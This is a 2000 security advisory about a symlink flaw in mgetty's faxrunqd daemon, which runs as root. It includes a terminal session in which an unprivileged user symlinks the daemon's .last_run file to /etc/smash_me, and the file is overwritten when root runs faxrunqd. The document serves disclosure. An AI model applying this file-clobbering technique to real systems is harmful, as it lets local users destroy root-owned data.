[ SOURCE: http://www.secureroot.com/security/advisories/9677971761.html ]

Author                 : Stan Bubrouski

Date                    : August 26, 2000

Package              : mgetty

Versions affected : 1.1.22, 1.1.21 and prior (at least back to 1994)

Severity               : faxrunqd follows symbolic links when creating

certain files. The default location

                             for the files is /var/spool/fax/outgoing,

which is a world-writable directory. Local

                             users can destroy the contents of any file on

a mounted filesystem because faxrunqd is

                             usually run by root.

Problem              : mgetty comes with a program named faxrunqd, which is

a daemon to send fax jobs queued

                             by faxspool(1).  Upon successful execution, a

file named .last_run is created in the

                             /var/spool/fax/outgoing/ directory which is

world-writable.  The problem lies in the

                             fact faxrunqd will follow symlinks created by

any user, allowing file creation anywhere

                             and allowing existing files to be

overwritten/destroyed.

Example:



Remote unprivilaged user:

[user@king /tmp]$ id

uid=200(user) gid=100(users) groups=100(users)

[user@king /tmp]$ ls -al /var/spool/fax/outgoing

total 3

drwxrwxrwt    3 root     root         1024 Jun  2 18:46 .

drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..

drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

[user@king /tmp]$ ls -al /etc/smash_me

-rw-r--r--    1 root     root           12 Jun  2 18:45 /etc/smash_me

[user@king /tmp]$ cat /etc/smash_me

Smash me!!!

[user@king /tmp]$ ln -s /etc/smash_me /var/spool/fax/outgoing/.last_run

[user@king /tmp]$ ls -al /var/spool/fax/outgoing

total 3

drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .

drwxr-xr-x    4 root     root         1024 Jun  2 18:46 ..

lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->

/etc/smash_me

drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks



Root console:

[root@king /tmp]# faxrunqd -l ttyS0

...



Remote unprivilaged user:

[user@king /tmp]$ ls -al /var/spool/fax/outgoing

total 3

drwxrwxrwt    3 root     root         1024 Jun  2 18:48 .

drwxr-xr-x    4 root     root         1024 Jun  2 18:48 ..

lrwxrwxrwx    1 user     users          13 Jun  2 18:48 .last_run ->

/etc/smash_me

drwxrwxrwx    2 root     root         1024 Jun  1 00:47 locks

[user@king /tmp]$ ls -al /etc/smash_me

-rw-r--r--    1 root     root           44 Jun  2 18:48 /etc/smash_me

[user@king /tmp]$ cat /etc/smash_me

Fri Jun  2 18:48:47 2000 /usr/sbin/faxrunqd

[user@king /tmp]$



Believed to be vulnerable:



Red Hat Linux 6.2 and all prior versions                 (Vulnerable)

Linux-Mandrake 7.1 and all prior versions              (Vulnerable)

Conectiva Linux 4.2, 5.0, and 5.1                          (Untested)

LinuxPPC 1999 and 2000                                     (Untested)

TurboLinux 4.0, 6.0                                              (Untested)

Debian 2.2 (potato), 2.1 (slink)                              (Untested)

Yellow Dog Linux Champion Server 1.0, 1.1, 1.2     (Untested)

MkLinux Pre Release 1 (R1)                                 (Untested)

Caldera OpenLinux 2.2, 2.3, 2.4                            (Untested)

Think Blue Linux 1.0 (Linux for the S/390)              (Untested)

OpenBSD 2.7? (mgetty is included in ports packages)

NetBSD 1.4.2?

FreeBSD?

Probably others...



Believed to be unaffected:

SuSE - all versions

Slackware - all versions